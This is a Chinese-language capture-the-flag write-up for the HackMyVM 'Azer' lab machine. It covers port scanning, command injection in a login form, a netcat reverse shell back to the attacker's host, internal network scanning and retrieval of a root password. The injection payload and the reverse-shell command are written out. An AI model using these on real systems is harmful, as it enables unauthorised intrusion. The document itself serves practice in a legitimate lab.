HackMyVM Azer
信息收集
$ nmap 192.168.100.54 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-01 06:19 EDT
Nmap scan report for 192.168.100.54
Host is up (0.00071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:D6:92:0B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 6.00 seconds
80 是一个网页 未发现明显线索
3000 端口是一个登录页面
随便试了一下弱口令后返回
好像会使用我输入的账密 执行脚本验证 所以我们进行命令注入
尝试使用 | id 发现没有回显
| sleep 5成功睡眠了
GetShell
那么我们直接开始反弹 Shell
使用 nc -c bash 192.168.100.100 9001 命令反弹 shell
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.100.100] from (UNKNOWN) [192.168.100.54] 59874
id
uid=1000(azer) gid=1000(azer) groups=1000(azer),100(users)获取
User Flag
azer@azer:~$ ls -al
total 64
drwx------ 5 azer azer 4096 Feb 21 2024 .
drwxr-xr-x 3 root root 4096 Feb 21 2024 ..
-rwxr-xr-x 1 azer azer 72 Feb 21 2024 get.sh
drwxr-xr-x 66 azer azer 4096 Feb 21 2024 node_modules
drwxr-xr-x 4 azer azer 4096 Feb 21 2024 .npm
-rw-r--r-- 1 azer azer 53 Feb 21 2024 package.json
-rw-r--r-- 1 azer azer 25336 Feb 21 2024 package-lock.json
-rw-r--r-- 1 azer azer 1950 Feb 21 2024 server.js
drwxr-xr-x 2 azer azer 4096 Feb 21 2024 .ssh
-rw------- 1 azer azer 33 Feb 21 2024 user.txt
azer@azer:~$ cat user.txt
0d2856d69dc348b3af80a0eed67c7502在家目录中获得了 user flag
Root提权
azer@azer:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:d6:92:0b brd ff:ff:ff:ff:ff:ff
inet 192.168.100.54/24 brd 192.168.100.255 scope global dynamic enp0s3
valid_lft 5317sec preferred_lft 5317sec
inet6 fe80::a00:27ff:fed6:920b/64 scope link
valid_lft forever preferred_lft forever
3: br-333bcb432cd5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:6c:62:72:35 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.1/24 brd 10.10.10.255 scope global br-333bcb432cd5
valid_lft forever preferred_lft forever
inet6 fe80::42:6cff:fe62:7235/64 scope link
valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:2c:c8:ed:3c brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
6: veth8c248f3@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-333bcb432cd5 state UP group default
link/ether 3e:b4:9b:14:67:55 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::3cb4:9bff:fe14:6755/64 scope link
valid_lft forever preferred_lft forever发现一个 docker 那么使用 fscan 扫描一下主机
azer@azer:~$ ./fscan -np -no -h 10.10.10.1/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-05-01 08:52:24] [INFO] 暴力破解线程数: 1
[2025-05-01 08:52:25] [INFO] 开始信息扫描
[2025-05-01 08:52:25] [INFO] CIDR范围: 10.10.10.0-10.10.10.255
[2025-05-01 08:52:25] [INFO] 生成IP范围: 10.10.10.0.%!d(string=10.10.10.255) - %!s(MISSING).%!d(MISSING)
[2025-05-01 08:52:25] [INFO] 解析CIDR 10.10.10.1/24 -> IP范围 10.10.10.0-10.10.10.255
[2025-05-01 08:52:25] [INFO] 最终有效主机数量: 256
[2025-05-01 08:52:25] [INFO] 开始主机扫描
[2025-05-01 08:52:25] [INFO] 有效端口数量: 233
[2025-05-01 08:53:01] [SUCCESS] 端口开放 10.10.10.10:80
[2025-05-01 08:53:01] [SUCCESS] 端口开放 10.10.10.1:80
[2025-05-01 08:53:06] [SUCCESS] 服务识别 10.10.10.10:80 => [http]发现了10.10.10.10:80
curl 出了一个奇怪的东西, 试了一下是 Root 密码
azer@azer:/$ curl 10.10.10.10:80
.:.AzerBulbul.:.Root Flag
root@azer:~# cat root.txt
b5d96aec2d5f1541c5e7910ccab527d8